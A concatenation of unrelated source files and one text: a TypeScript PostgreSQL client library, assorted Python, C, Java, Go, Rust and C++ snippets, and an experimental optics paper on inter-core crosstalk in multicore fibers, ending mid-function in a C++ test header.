         const tx_client = await this.getClient()

         const release_ref = tx_client.release
         tx_client.release = () => {}

         const release = () => {
            log('RELEASE transaction client')
            tx_client.release = release_ref
            tx_client.release()
         }

         try {
            log('BEGIN transaction')
            await tx_client.query('BEGIN')
            hook_lifecycle.onBegin(transaction_id)

            const tiny_tx: TinyPg = Object.create(this)
            tiny_tx.transaction_id = transaction_id

            const assertThennable = (tx_fn_result: any) => {
               if (_.isNil(tx_fn_result) || !_.isFunction(tx_fn_result.then)) {
                  throw new Error('Expected thennable to be returned from transaction function.')
               }
               return tx_fn_result
            }

            tiny_tx.transaction = <T = any>(tx_fn: (db: TinyPg) => Promise<T>): Promise<T> => {
               log('inner transaction')
               return assertThennable(tx_fn(tiny_tx))
            }

            tiny_tx.getClient = async () => {
               log('getClient (transaction)')
               return tx_client
            }

            const result = await assertThennable(tx_fn(tiny_tx))

            log('COMMIT transaction')
            await tx_client.query('COMMIT')
            hook_lifecycle.onCommit(transaction_id)

            return result
         } catch (error) {
            log('ROLLBACK transaction')
            await tx_client.query('ROLLBACK')
            hook_lifecycle.onRollback(transaction_id, error)
            throw error
         } finally {
            release()
         }
      })
   }

   withHooks(hooks: T.TinyHooks): TinyPg {
      const new_tiny = Object.create(this) as TinyPg
      new_tiny.hooks = [...new_tiny.hooks, hooks]
      return new_tiny
   }

   makeHooksLifeCycle(): Required<T.TinyHookLifecycle> {
      const hooks_to_run: T.HookSetWithContext[] = this.hooks.map(hook_set => {
         return { ctx: null, transaction_ctx: null, hook_set: hook_set }
      })

      const preHook = (
         fn_name: 'preSql' | 'preRawQuery',
         ctx: T.TinyCallContext,
         args: [string, T.TinyPgParams]
      ): T.HookResult<[string, T.TinyPgParams]> => {
         return hooks_to_run.reduce(
            (last_result, hook_set_with_ctx) => {
               const hook_fn: any = hook_set_with_ctx.hook_set[fn_name]

               if (_.isNil(hook_fn) || !_.isFunction(hook_fn)) {
                  return last_result
               }

               const [name_or_query, params] = last_result.args
               const result = hook_fn(ctx, name_or_query, params)
               hook_set_with_ctx.ctx = result.ctx
               return result
            },
            { args: args, ctx: ctx }
         )
      }

      const dbCallHook = (
         fn_name: 'onSubmit' | 'onQuery' | 'onResult',
         query_context: T.QuerySubmitContext | T.QueryBeginContext | T.QueryCompleteContext
      ): void => {
         _.forEach(hooks_to_run, hook_set_with_ctx => {
            const hook_fn: any = hook_set_with_ctx.hook_set[fn_name]

            if (_.isNil(hook_fn) || !_.isFunction(hook_fn)) {
               return
            }

            try {
               hook_set_with_ctx.ctx = hook_fn(hook_set_with_ctx.ctx, <any>query_context)
            } catch (error) {
               log(`${fn_name} hook error`, error)
            }
         })
      }

      const transactionHook = (
         fn_name: 'preTransaction' | 'onBegin' | 'onCommit' | 'onRollback',
         transaction_id: string,
         transaction_error?: Error
      ) => {
         _.forEach(hooks_to_run, hook_set_with_ctx => {
            const hook_fn: any = hook_set_with_ctx.hook_set[fn_name]

            if (_.isNil(hook_fn) || !_.isFunction(hook_fn)) {
               return
            }

            try {
               hook_set_with_ctx.transaction_ctx =
                  fn_name === 'preTransaction'
                     ? hook_fn(transaction_id)
                     : hook_fn(hook_set_with_ctx.transaction_ctx, transaction_id, transaction_error)
            } catch (error) {
               log(`${fn_name} hook error`, error)
            }
         })
      }

      return {
         preSql: (ctx: T.TinyCallContext, args) => {
            return preHook('preSql', ctx, args)
         },
         preRawQuery: (ctx: T.TinyCallContext, args) => {
            return preHook('preRawQuery', ctx, args)
         },
         onSubmit: (query_submit_context: T.QuerySubmitContext) => {
            dbCallHook('onSubmit', query_submit_context)
         },
         onQuery: (query_begin_context: T.QueryBeginContext) => {
            dbCallHook('onQuery', query_begin_context)
         },
         onResult: (query_complete_context: T.QueryCompleteContext) => {
            dbCallHook('onResult', query_complete_context)
         },
         preTransaction: (transaction_id: string) => {
            transactionHook('preTransaction', transaction_id)
         },
         onBegin: (transaction_id: string) => {
            transactionHook('onBegin', transaction_id)
         },
         onCommit: (transaction_id: string) => {
            transactionHook('onCommit', transaction_id)
         },
         onRollback: (transaction_id: string, transaction_error: Error) => {
            transactionHook('onRollback', transaction_id, transaction_error)
         },
      }
   }

   formattable(name: string): FormattableDbCall {
      const db_call: DbCall = this.sql_db_calls[name]

      if (_.isNil(db_call)) {
         throw new Error(`Sql query with name [${name}] not found!`)
      }

      return new FormattableDbCall(db_call, this)
   }

   isolatedEmitter(): T.Disposable & TinyPg {
      const new_event_emitter = new EventEmitter()

      const tiny_overrides: Partial<TinyPg> = { events: new_event_emitter }

      return _.create(
         TinyPg.prototype,
         _.extend<T.Disposable>(
            {
               dispose: () => {
                  new_event_emitter.removeAllListeners()
               },
            },
            this,
            tiny_overrides
         )
      )
   }

   close(): Promise<void> {
      return this.pool.end()
   }

   getClient(): Promise<Pg.PoolClient> {
      log(`getClient [total=${this.pool.totalCount},waiting=${this.pool.waitingCount},idle=${this.pool.idleCount}]`)
      return this.pool.connect()
   }

   async performDbCall<T extends object = any, P extends T.TinyPgParams = T.TinyPgParams>(
      db_call: DbCall,
      hooks: Required<T.TinyHookLifecycle>,
      params?: P,
      query_id?: string
   ): Promise<T.Result<T>> {
      log('performDbCall', db_call.config.name)

      let call_completed = false
      let client: Pg.PoolClient

      const start_at = Date.now()

      const begin_context: T.QueryBeginContext = {
         id: _.isNil(query_id) ? Uuid.v4() : query_id,
         sql: db_call.config.parameterized_query,
         start: start_at,
         name: db_call.config.name,
         params: params,
      }

      let submit_context: T.QuerySubmitContext | null = null

      // Work around node-postgres swallowing queries after a connection error
      // https://github.com/brianc/node-postgres/issues/718
      const connection_failed_promise = new Promise<void>((resolve, reject) => {
         const checkForConnection = () => {
            if (call_completed) {
               resolve()
            } else if (_.get(client, 'connection.stream.destroyed', false)) {
               reject(new Error('Connection terminated'))
            } else {
               setTimeout(checkForConnection, 500)
            }
         }

         setTimeout(checkForConnection, 500)
      })

      const query_promise = async (): Promise<T.Result<T>> => {
         client = await this.getClient()

         let error: any = null

         try {
            hooks.onQuery(begin_context)
            this.events.emit('query', begin_context)

            log('executing', db_call.config.name)

            const values: any[] = _.map(db_call.config.parameter_map, m => {
               if (!_.has(params, m.name)) {
                  throw new Error(`Missing expected key [${m.name}] on input parameters.`)
               }

               return _.get(params, m.name)
            })

            const query: TinyQuery = db_call.config.prepared
               ? new Pg.Query({
                    name: db_call.prepared_name,
                    text: db_call.config.parameterized_query,
                    values: values,
                 })
               : new Pg.Query(db_call.config.parameterized_query, values)

            const original_submit = query.submit

            query.submit = (connection: any) => {
               const submitted_at = Date.now()
               submit_context = { ...begin_context, submit: submitted_at, wait_duration: submitted_at - begin_context.start }

               hooks.onSubmit(submit_context)
               this.events.emit('submit', submit_context)

               original_submit.call(query, connection)
            }

            const result = await new Promise<Pg.QueryResult>((resolve, reject) => {
               query.callback = (err: any, res: any) => (err ? reject(err) : resolve(res))
               client.query(query)
            })

            log('execute result', db_call.config.name)

            return { row_count: result.rowCount, rows: result.rows, command: result.command }
         } catch (e) {
            error = e
            throw e
         } finally {
            if (!_.isNil(error) && (!error['code'] || _.startsWith(error['code'], '57P'))) {
               client.release(error)
            } else {
               client.release()
            }
         }
      }

      const createCompleteContext = (error: any, data: T.Result<T> | null): T.QueryCompleteContext => {
         const end_at = Date.now()
         const query_duration = end_at - start_at

         const submit_timings = _.isNil(submit_context) ?
{ submit: undefined, wait_duration: query_duration, active_duration: 0, } : { submit: submit_context.submit, wait_duration: submit_context.wait_duration, active_duration: end_at - submit_context.submit, } return { ...begin_context, ...submit_timings, end: end_at, duration: query_duration, error: error, data: data, } } const emitQueryComplete = (complete_context: T.QueryCompleteContext) => { hooks.onResult(complete_context) this.events.emit('result', complete_context) } try { const data = await Promise.race([ connection_failed_promise.then(() => null), query_promise() ]) if (_.isNil(data)) { throw new E.TinyPgError("connection aborted") } emitQueryComplete(createCompleteContext(null, data)) return data } catch (e) { const tiny_stack = `[${db_call.config.name}]\n\n${db_call.config.text}\n\n${e.stack}` const complete_context = createCompleteContext(e, null) emitQueryComplete(complete_context) const tiny_error = new E.TinyPgError(`${e.message}`, tiny_stack, complete_context) throw this.error_transformer(tiny_error) } finally { call_completed = true } } } export class DbCall { config: T.DbCallConfig prepared_name?: string constructor(config: T.DbCallConfig) { this.config = config if (this.config.prepared) { const hash_code = Util.hashCode(config.parameterized_query).toString().replace('-', 'n') this.prepared_name = `${config.name}_${hash_code}`.substring(0, 63) } } } export class FormattableDbCall { private db: TinyPg private db_call: DbCall constructor(db_call: DbCall, tiny: TinyPg) { this.db = tiny this.db_call = db_call } format(...args: any[]): FormattableDbCall { const formatted_sql = PgFormat(this.db_call.config.text, ...args) const parsed = parseSql(formatted_sql) const new_db_call = new DbCall({ ...this.db_call.config, text: formatted_sql, parameterized_query: parsed.parameterized_sql, parameter_map: parsed.mapping, }) return new FormattableDbCall(new_db_call, this.db) } query<T extends object = any, P extends T.TinyPgParams = T.TinyPgParams>(params?: P): Promise<T.Result<T>> { const hook_lifecycle = this.db.makeHooksLifeCycle() return this.db.performDbCall(this.db_call, hook_lifecycle, params) } }
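The TinyPg class above is easiest to read alongside a usage sketch. The following is illustrative only: the connection string, the ./sql directory layout, the import path, and the 'users.find' call key are assumptions about how the parsed files are keyed, not something specified in this file.

// Hypothetical usage of the TinyPg class defined above.
// Assumes ./sql/users/find.sql exists with content like:
//   SELECT * FROM users WHERE id = :id;
// (the derived call key 'users.find' is an assumption about the parser's naming)
import { TinyPg } from 'tinypg'

const db = new TinyPg({
   connection_string: 'postgres://user:pass@localhost:5432/app', // illustrative
   root_dir: ['./sql'],
})

async function example(): Promise<void> {
   // Named call backed by a parsed .sql file.
   const found = await db.sql('users.find', { id: 1 })
   console.log(found.rows, found.row_count)

   // Ad-hoc query; :named parameters are parsed the same way.
   await db.query('UPDATE users SET name = :name WHERE id = :id', { name: 'x', id: 1 })

   // transaction() wraps BEGIN/COMMIT/ROLLBACK and hands back a TinyPg bound
   // to a single client; the callback must return a thenable.
   await db.transaction(async tx => {
      await tx.query('INSERT INTO audit (msg) VALUES (:msg)', { msg: 'hello' })
      return tx.sql('users.find', { id: 1 })
   })

   await db.close()
}

example().catch(console.error)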
def _fix_neg_log(self, path):
    # Recompute the cumulative negative log probability along a lattice path
    # (assumes `import math` at module scope).
    paths = []
    tail = path
    while tail:
        paths.append(tail)
        tail = tail.prev_path
    paths = paths[::-1]
    s = 1
    max_step = False  # when enabled, only the last few steps are recomputed
    if max_step:
        s = max(s, len(paths) - 5)
    for i in range(s, len(paths)):
        cur_path = paths[i]
        prev_path = paths[i - 1]
        node = cur_path.nodes[-1]
        prob_idx = self.lattice_vocab[node.start_idx].index(node.word_idx)
        new_neg_log_prob = prev_path.neg_log_prob - math.log(prev_path.transition_probs[0][prob_idx])
        if cur_path.neg_log_prob != new_neg_log_prob:
            cur_path.neg_log_prob = new_neg_log_prob
/**
 * @brief Write secondary output voltage value to SMPS_settings instance
 * @details @todo describe how to set the voltage
 **/
inline void smps_out_voltage_write(volatile struct SMPS_settings* smps_sets,
                                   const struct SMPS_PID_reg smps_pid, float vout){
    if(vout > SMPS_OUT_VOLTAGE_MAX_F32)
        vout = SMPS_OUT_VOLTAGE_MAX_F32;
    else if(vout < SMPS_OUT_VOLTAGE_MIN_F32)
        vout = SMPS_OUT_VOLTAGE_MIN_F32;

    float out_power_max = smps_output_power_max_get(vout);
    float input_current_max = SMPS_OVERLOAD_COEFF_F32 * out_power_max * SMPS_TRANSFORMER_TURNS_RATIO_F32
                              /(vout * SMPS_EFFICIENCY_F32);
    float input_current = smps_sets->max_prim_current_f32;
    if(input_current > input_current_max){
        /* TODO: this overload branch is empty in the original source; presumably the
         * primary current limit should be clamped here, e.g.
         * smps_sets->max_prim_current_f32 = input_current_max; (assumption) */
    }

    if((vout - smps_pid.voltage_ref_f32) > SMPS_SOFTSTART_VOLTAGE_DIFF_F32)
        smps_sets->soft_start = SMPS_SOFTSTART_UP;
    else if((vout - smps_pid.voltage_ref_f32) < -SMPS_SOFTSTART_VOLTAGE_DIFF_F32)
        smps_sets->soft_start = SMPS_SOFTSTART_DOWN;
    else
        smps_sets->soft_start = 0;

    smps_sets->out_voltage_f32 = vout;
}
// src/config/constants.ts

// import { DATE_YEAR } from '@src/utils/date';
import { IS_DEVELOPMENT } from './settings';

export const DEBUG_MARKERS = IS_DEVELOPMENT
  ? { endColor: 'red', fontSize: '12px', startColor: 'green' }
  : undefined;

export const CLIENT_ASSET_PATH = `https://s3-us-west-1.amazonaws.com/mattscholta`;
export const CLIENT_CLOUDINARY = `https://res.cloudinary.com/mattscholta/image/upload`;

export const SITE_AUTHOR = `<NAME>`;
export const SITE_DESCRIPTION = `The online portfolio of <NAME>ta, a Software Engineer!`;
export const SITE_EMAIL_ADDRESS = `<EMAIL>`;
export const SITE_EMAIL_LINK = `mailto:${SITE_EMAIL_ADDRESS}`;
export const SITE_FACEBOOK = 'https://www.facebook.com/barguide';
export const SITE_INSTAGRAM = 'https://www.instagram.com/barguide';
export const SITE_URL = 'https://mattscholta.com';
export const SITE_TITLE = `Matthew Scholta`;
// export const SITE_TITLE = `Matthew Scholta | ${DATE_YEAR}`;
Inter-Core Crosstalk in Multicore Fibers: Impact on 56-Gbaud/λ/Core PAM-4 Transmission

We experimentally demonstrate the impact of inter-core crosstalk in multicore fibers on 56-Gbaud PAM-4 signal quality after 2.5-km transmission over weakly-coupled and uncoupled seven-core fibers, revealing the dependence of the crosstalk on the carrier central wavelength in the range of 1540-1560 nm.

Introduction

The towering increase in traffic demand in datacenters imposes the need for solutions that, on the one hand, are capable of coping with the constantly growing bandwidth requirements 1 and, on the other hand, deal with the bandwidth-density issues 2 . In this regard, spatial division multiplexing (SDM) has been proposed on top of high-speed and low-cost short-reach interfaces to address the bandwidth-density problem and to improve scalability 2,3 . SDM can be realized in a single fiber through separation of either the signal's modes, the fiber's cores, or a combination of the two. High spatial density leads to a potentially high number of parallel transmission lanes, but at the same time induces a strong coupling effect between the spatially separated channels and therefore incurs a penalty in transmission performance. Weakly-coupled multicore fibers (MCFs) are an option in which a residual coupling effect is present, but it does not impose additional signal-processing requirements at the receiver 4 . Previous works have modelled the time 5 and frequency 6 dependencies of the inter-core crosstalk in multicore fibers of different types and structural designs. However, experimental validation for high-speed data transmission (100 Gbps and beyond) has not been done yet. Such analyses would provide essential data for designing an MCF structure with pre-defined characteristics for data transmission. In this paper, for the first time to the best of our knowledge, we experimentally determine the impact that the time- and frequency-dependent inter-core crosstalk in multicore fibers has on 56-Gbaud PAM-4 signals transmitted over 2.5-km fiber links for intra-datacenter networks, which use MCFs with similar geometrical design and fiber parameters (such as attenuation and dispersion) but different inter-core crosstalk. A statistical analysis is performed on more than 1 000 BER measurements to reveal the time and frequency dependence, which may result in a transmission penalty for a deployed link.

Experimental setup and fibers

The setup used for this purpose is illustrated in Fig. 1. To generate a PAM-4 signal, we used an approach that could be described as "attenuate-delay-and-combine". At the transmitter, two electrical signals from a pulse pattern generator (PPG), representing a 2^15-1 long pseudorandom binary sequence (PRBS15) at 56 Gbaud, are decorrelated and then passively combined into a single 56-Gbaud PAM-4 signal. This signal is amplified to drive a 40-GHz external Mach-Zehnder modulator (MZM), which modulates the optical carrier from an external cavity laser (ECL). The optical carrier's central wavelength is set to 1540 nm, 1552 nm and 1560 nm to cover a major part of the C-band. The modulated optical signal is then amplified by an Erbium-doped fiber amplifier (EDFA) to compensate the losses that appear due to 1:8 signal splitting and decorrelation before the spatially distributed channels are coupled into the 2.5-km seven-core fiber via a fan-in device (FI).

In this experiment, we used two different types of hexagonal multicore fibers: a weakly-coupled MCF (WCMCF) and an uncoupled MCF (UCMCF). Their key parameters are summarized in Tab. 1. After the transmission, the spatial channels are demultiplexed by a fan-out device (FO). The signals from each core are then sent for detection. The receiver part consists of an EDFA preamplifier, a wave-shaper, which functioned as an optical bandpass filter (OBPF) and a variable attenuator, a 40-GHz PIN photodiode, a 65-GHz electrical amplifier, and a digital storage oscilloscope (DSO, 33 GHz, 80 GSa/s). Finally, the captured traces of the sampled signals are processed offline with a digital signal processing (DSP) chain consisting of a low-pass filter, a maximum-variance timing recovery, a symbol-spaced decision-feedback equalizer (DFE) with 43 feed-forward taps (FFT) and 12 feedback taps (FBT), and an error counter. Note that the DFE tap weights were obtained for each fiber, each core, and each wavelength.

Results and discussion

This section presents experimental results showing how the bit-error rate (BER) changes with the received optical power (ROP), along with the BER statistics for each core of the multicore fibers carrying different wavelengths centered at 1540 nm, 1552 nm or 1560 nm, with ROPs at the photodetector adjusted to 0 dBm and -1 dBm, respectively. Figure 2 compares the BER curves for three configurations of the fiber link: first, the 56-Gbaud PAM-4 signals are coupled only into core 1 of the weakly-coupled multicore fiber while the other cores are idle; second, signals are coupled into all cores of the uncoupled multicore fiber while the traces of the signals received after transmission over core 1 are captured by the DSO for further post-processing and BER counting; third, an optical back-to-back (OB2B) configuration. For each data point, five (5) traces are captured and analyzed. Figure 2 displays the mean BER values. It serves as a reference, proving that the difference between the BERs obtained for the WCMCF measurement and for the UCMCF (shown in Fig. 3) is mainly due to the considerably higher inter-core crosstalk in the weakly-coupled multicore fiber. If this crosstalk were eliminated, the signal quality would be identical, indicating similar properties of a single core in both types of MCFs. In addition, Fig. 2 shows that the crosstalk levels in the uncoupled MCF are too small to impact signal quality in short-reach fiber-optic links employing 56-Gbaud PAM-4 signaling. The BER curves obtained for the OB2B (Fig. 2) show that this experimental setup suffers from the chirp-dispersion interaction under the bandwidth-limited conditions imposed by the DSO bandwidth. This leads to a BER improvement after transmission over the multicore fiber link compared to the OB2B transmission. Figure 3 illustrates data from 1 050 BER measurements that were performed to reveal the impact of the inter-core crosstalk between adjacent cores on 56-Gbaud PAM-4 transmission over the multicore fibers. These measurements were performed close to the sensitivity threshold of the PD for the hard-decision forward error correction (HD-FEC) of 3.8×10^-3 to ensure that sufficient error statistics are accumulated for each captured trace. The results reveal several key properties of the inter-core crosstalk. First, it has a major impact on the received signal quality even after relatively short transmission (such as 2.5 km) over the weakly-coupled MCF.

Second, this crosstalk is wavelength dependent, which means that its impact on signal quality is also wavelength dependent. This is confirmed by the BER results. Third, the crosstalk dynamics in the weakly-coupled MCF, which were theoretically described previously 5 , were observed during the measurements and are depicted by the error bars, which can substantially differ from the mean BER values averaged over the number of processed measurements.

Concluding remarks

The impact of inter-core crosstalk on a 56-Gbaud PAM-4 transmission over a seven-core fiber is experimentally demonstrated, showing the crosstalk's wavelength dependence as well as revealing its time dependence in a system implementation. The study was performed using 2.5-km-long weakly-coupled and uncoupled multicore fibers having -11 dB/100 km and -45 dB/100 km crosstalk between adjacent cores, respectively. The BER results show that shorter wavelengths are more affected by this type of crosstalk in terms of average BER performance, while longer wavelengths exhibit a larger fluctuation range, which means that a system using the WCMCF shows noticeably higher instability in time, even in short-reach systems.
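As a rough sanity check (our addition, not part of the measurements above), the per-length crosstalk figures in Tab. 1 can be scaled to the 2.5-km spans, assuming the accumulated crosstalk power grows approximately linearly with length in the weak-coupling regime:

$$XT(L)\,[\mathrm{dB}] \approx XT_{100\,\mathrm{km}} + 10\log_{10}\!\left(\frac{L}{100\ \mathrm{km}}\right),$$

which gives $XT_{\mathrm{WCMCF}}(2.5\,\mathrm{km}) \approx -11 + 10\log_{10}(0.025) \approx -27$ dB and $XT_{\mathrm{UCMCF}}(2.5\,\mathrm{km}) \approx -45 - 16 \approx -61$ dB, consistent with the crosstalk being visible in the WCMCF results and negligible in the UCMCF results. Similarly, the "attenuate-delay-and-combine" transmitter can be summarized as mapping two decorrelated binary streams onto one four-level symbol,

$$s_{\mathrm{PAM4}}(t) = 2\,b_{\mathrm{MSB}}(t) + b_{\mathrm{LSB}}(t), \qquad b_i(t) \in \{0, 1\},$$

where the factor of two is set by the relative attenuation of the two combined paths.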
/** * Parses {@code List<String> ingredientNames} into a {@code List<IngredientName>}. */ public static List<IngredientName> parseIngredientNames(List<String> ingredientNames) { requireNonNull(ingredientNames); return ingredientNames.stream().map(IngredientName::new).collect(Collectors.toList()); }
n = input() s = raw_input() out = [" "]*n if n%2 == 0: x = n/2-1 for i in xrange(0, n, 2): out[x] = s[i] x -= 1 x = n/2 for i in xrange(1, n, 2): out[x] = s[i] x += 1 else: x = n/2 for i in xrange(0, n, 2): out[x] = s[i] x += 1 x = n/2-1 for i in xrange(1, n, 2): out[x] = s[i] x -= 1 print "".join(out)
def convert_point_notation(tree: etree.Element):
    # Convert legacy <Point x=".." y=".."/> children into the compact
    # points="x1,y1 x2,y2 ..." attribute on each <Coords> element.
    for coord in [c for c in tree.findall(".//{*}Coords") if not c.attrib.get("points")]:
        cc = []
        # findall (not find) is needed here: find returns only the first Point
        # element, and iterating over it would walk its children instead.
        for point in coord.findall("./{*}Point"):
            cx = point.attrib["x"]
            cy = point.attrib["y"]
            coord.remove(point)
            cc.append(f"{cx},{cy}")
        coord.attrib["points"] = " ".join(cc)
declare namespace Jymfony.Component.Console.Output {
    export class ConsoleOutputInterface extends OutputInterface.definition {
        public static readonly definition: Newable<ConsoleOutputInterface>;

        /**
         * Output interface used for errors.
         */
        public errorOutput: Jymfony.Component.Console.Output.OutputInterface;
    }
}
// RandomID returns the hexadecimal encoding of 8 random bytes (a 16-character string).
func RandomID() string {
	b := make([]byte, 8)
	n, _ := rand.Read(b)
	return fmt.Sprintf("%x", b[:n])
}
#include <bits/stdc++.h>
#define FastIO ios::sync_with_stdio(0); cin.tie(0); cout.tie(0);
using namespace std;

typedef pair<int, int> pii;
typedef pair<string, int> psi;
typedef pair<long long, long long> pll;
typedef pair<char, int> pci;
typedef pair<int, char> pic;
typedef long long ll;
#define MX 1000000000

// Round the floating-point root and verify exactly; plain truncation of
// sqrt() can be off by one near large perfect squares.
bool isSquare(int x) {
    int sr = (int)llround(sqrt((double)x));
    return (sr * sr == x);
}

// One test case: answer YES iff a == 2*k*k or a == 4*k*k for some integer k.
void solve() { //will run n times
    int a;
    cin >> a;
    if(a%2 == 0 && isSquare(a/2)){
        cout << "YES" << endl;
    } else if (a%4 == 0 && isSquare(a/4)){
        cout << "YES" << endl;
    } else {
        cout << "NO" << endl;
    }
}

int main() {
    FastIO; //DONT DELETE
    int n;
    cin >> n;
    while (n--) {
        solve();
    }
    return 0;
}
// xrpl_sdk_jsonrpc/src/api/account_lines.rs

use crate::{client::RpcRequest, Client, Result};
use serde::{de::DeserializeOwned, Deserialize, Serialize};

#[derive(Default, Clone, Serialize)]
pub struct AccountLinesParams {
    account: String,
    // #[serde(skip_serializing_if = "Option::is_none")]
    // ledger_hash: Option<String>,
    // #[serde(skip_serializing_if = "Option::is_none")]
    // ledger_index: Option<String>,
    // #[serde(skip_serializing_if = "Option::is_none")]
    // strict: Option<bool>,
    // TODO: add more parameters!
}

/// The account_lines method returns information about an account's trust lines,
/// including balances in all non-XRP currencies and assets. All information
/// retrieved is relative to a particular version of the ledger.
///
/// https://xrpl.org/account_lines.html
#[must_use = "Does nothing until you send or execute it"]
#[derive(Default, Clone)]
pub struct AccountLinesRequest {
    client: Client,
    params: AccountLinesParams,
}

impl AccountLinesRequest {
    pub async fn execute<T: DeserializeOwned>(self) -> Result<T> {
        let request = RpcRequest {
            method: "account_lines".to_string(),
            params: vec![self.params],
        };
        self.client.send::<AccountLinesParams, T>(request).await
    }

    pub async fn send(self) -> Result<AccountLinesResponse> {
        self.execute().await
    }
}

// TODO: consider extracting as a type.
#[derive(Debug, Serialize, Deserialize)]
pub struct AccountLine {
    pub account: String,
    pub balance: String,
    pub currency: String,
    pub limit: String,
    pub limit_peer: String,
    pub no_ripple: bool,
    pub quality_in: u64,
    pub quality_out: u64,
}

#[derive(Debug, Deserialize)]
pub struct AccountLinesResponse {
    pub lines: Vec<AccountLine>,
}

impl Client {
    pub fn account_lines(&self, account: &str) -> AccountLinesRequest {
        AccountLinesRequest {
            client: self.clone(),
            params: AccountLinesParams {
                account: account.to_string(),
            },
        }
    }
}

#[cfg(test)]
mod tests {
    use crate::client::Client;

    #[tokio::test]
    async fn account_lines_works() {
        let client = Client::default();

        let resp = client
            .account_lines("r9cZA1mLK5R5Am25ArfXFmqgNwjZgnfk59")
            .send()
            .await;

        dbg!(&resp);

        // if let Ok(resp) = resp {
        //     let order_book = resp.order_book;
        //     assert_eq!(order_book.bid_queue().len() as u32, depth);
        //     assert_eq!(order_book.ask_queue().len() as u32, depth);
        // }
    }
}
// This file is part of the dune-gdt project: // https://github.com/dune-community/dune-gdt // Copyright 2010-2018 dune-gdt developers and contributors. All rights reserved. // License: Dual licensed as BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause) // or GPL-2.0+ (http://opensource.org/licenses/gpl-license) // with "runtime exception" (http://www.dune-project.org/license.html) // Authors: // <NAME> (2019) #ifndef DUNE_GDT_TEST_STATIONARY_EOCSTUDIES_DIFFUSION_IPDG_HH #define DUNE_GDT_TEST_STATIONARY_EOCSTUDIES_DIFFUSION_IPDG_HH #include <atomic> #include <cmath> #include <dune/xt/la/container.hh> #include <dune/xt/la/eigen-solver.hh> #include <dune/xt/la/matrix-inverter.hh> #include <dune/xt/grid/boundaryinfo/interfaces.hh> #include <dune/xt/grid/entity.hh> #include <dune/xt/grid/filters/intersection.hh> #include <dune/xt/grid/integrals.hh> #include <dune/xt/grid/layers.hh> #include <dune/xt/functions/derivatives.hh> #include <dune/xt/functions/interfaces/grid-function.hh> #include <dune/xt/functions/visualization.hh> #include <dune/gdt/functionals/vector-based.hh> #include <dune/gdt/local/functionals/integrals.hh> #include <dune/gdt/local/bilinear-forms/integrals.hh> #include <dune/gdt/local/integrands/laplace.hh> #include <dune/gdt/local/integrands/laplace-ipdg.hh> #include <dune/gdt/local/integrands/ipdg.hh> #include <dune/gdt/local/integrands/product.hh> #include <dune/gdt/local/integrands/conversion.hh> #include <dune/gdt/norms.hh> #include <dune/gdt/operators/constant.hh> #include <dune/gdt/operators/laplace-ipdg-flux-reconstruction.hh> #include <dune/gdt/operators/lincomb.hh> #include <dune/gdt/operators/matrix-based.hh> #include <dune/gdt/operators/oswald-interpolation.hh> #include <dune/gdt/spaces/l2/discontinuous-lagrange.hh> #include <dune/gdt/spaces/l2/finite-volume.hh> #include <dune/gdt/spaces/h1/continuous-lagrange.hh> #include <dune/gdt/spaces/hdiv/raviart-thomas.hh> #include "base.hh" namespace Dune { namespace GDT { namespace Test { /** * \todo Add treatment of nonzero Dirichlet boundary values * \todo Add treatment of Neumann boundary values */ template <class G, XT::LA::Backends la = XT::LA::Backends::istl_sparse> class StationaryDiffusionIpdgEocStudy : public StationaryEocStudy<typename XT::Grid::Layer<G, XT::Grid::Layers::leaf, XT::Grid::Backends::view>::type, 1, la> { protected: using BaseType = StationaryEocStudy<typename XT::Grid::Layer<G, XT::Grid::Layers::leaf, XT::Grid::Backends::view>::type, 1, la>; static constexpr size_t d = BaseType::d; using typename BaseType::DF; using typename BaseType::GP; using typename BaseType::GV; using typename BaseType::I; using typename BaseType::M; using typename BaseType::O; using typename BaseType::R; using typename BaseType::S; using typename BaseType::V; public: using typename BaseType::E; StationaryDiffusionIpdgEocStudy(const double& symmetry_prefactor, const double& inner_penalty, const double& dirichlet_penalty, const std::function<double(const I&)>& intersection_diameter = LocalIPDGIntegrands::internal::default_intersection_diameter<I>()) : BaseType() , space_type_("") , symmetry_prefactor_(symmetry_prefactor) , inner_penalty_(inner_penalty) , dirichlet_penalty_(dirichlet_penalty) , intersection_diameter_(intersection_diameter) {} protected: using FF = XT::Functions::GridFunctionInterface<E>; using FT = XT::Functions::GridFunctionInterface<E, d, d>; virtual const XT::Grid::BoundaryInfo<I>& boundary_info() const = 0; virtual const FT& diffusion() const = 0; virtual const FF& force() const = 0; virtual 
const FT& weight_function() const = 0;

  std::vector<std::string> norms() const override
  {
    auto nrms = BaseType::norms();
    nrms.push_back("eta_NC");
    nrms.push_back("eta_R");
    nrms.push_back("eta_DF");
    return nrms;
  }

  std::map<std::string, std::map<std::string, double>>
  compute(const size_t refinement_level,
          const std::vector<std::string>& actual_norms,
          const std::vector<std::pair<std::string, std::string>>& actual_estimates,
          const std::vector<std::string>& actual_quantities) override
  {
    auto& self = *this;
    // compute the quantities/norms/estimates we know about and remove them from the todos
    // store the data in current_data_, BaseType::compute will return that
    auto remaining_norms = actual_norms;
    auto remaining_estimates = actual_estimates;
    auto remaining_quantities = actual_quantities;
    if (self.current_refinement_ != refinement_level)
      self.discretization_info(refinement_level);
    DUNE_THROW_IF(!self.current_space_, InvalidStateException, "");
    // compute current solution
    const auto& current_space = *self.current_space_;
    // visualize
    if (DXTC_TEST_CONFIG_GET("setup.visualize", false)) {
      const std::string prefix = XT::Common::Test::get_unique_test_name() + "_problem_";
      const std::string postfix = "_ref_" + XT::Common::to_string(refinement_level);
      // XT::Functions::visualize(self.diffusion_factor(), current_space.grid_view(), prefix + "diffusion_factor" + postfix);
      XT::Functions::visualize(self.diffusion(), current_space.grid_view(), prefix + "diffusion" + postfix);
      XT::Functions::visualize(self.force(), current_space.grid_view(), prefix + "force" + postfix);
      // XT::Functions::visualize(self.dirichlet(), current_space.grid_view(), prefix + "dirichlet" + postfix);
      // XT::Functions::visualize(self.neumann(), current_space.grid_view(), prefix + "neumann" + postfix);
    }
    Timer timer;
    const auto solution = make_discrete_function(current_space, self.solve(current_space));
    // only set time if this did not happen in solve()
    if (self.current_data_["quantity"].count("time to solution (s)") == 0)
      self.current_data_["quantity"]["time to solution (s)"] = timer.elapsed();
    for (auto norm_it = remaining_norms.begin(); norm_it != remaining_norms.end(); /*Do not increment here ...*/) {
      const auto norm_id = *norm_it;
      if (norm_id == "eta_NC") {
        norm_it = remaining_norms.erase(norm_it); // ... but rather here ...
        // compute estimate
        auto oswald_interpolation_operator = make_oswald_interpolation_operator<M>(
            current_space.grid_view(), current_space, current_space, boundary_info());
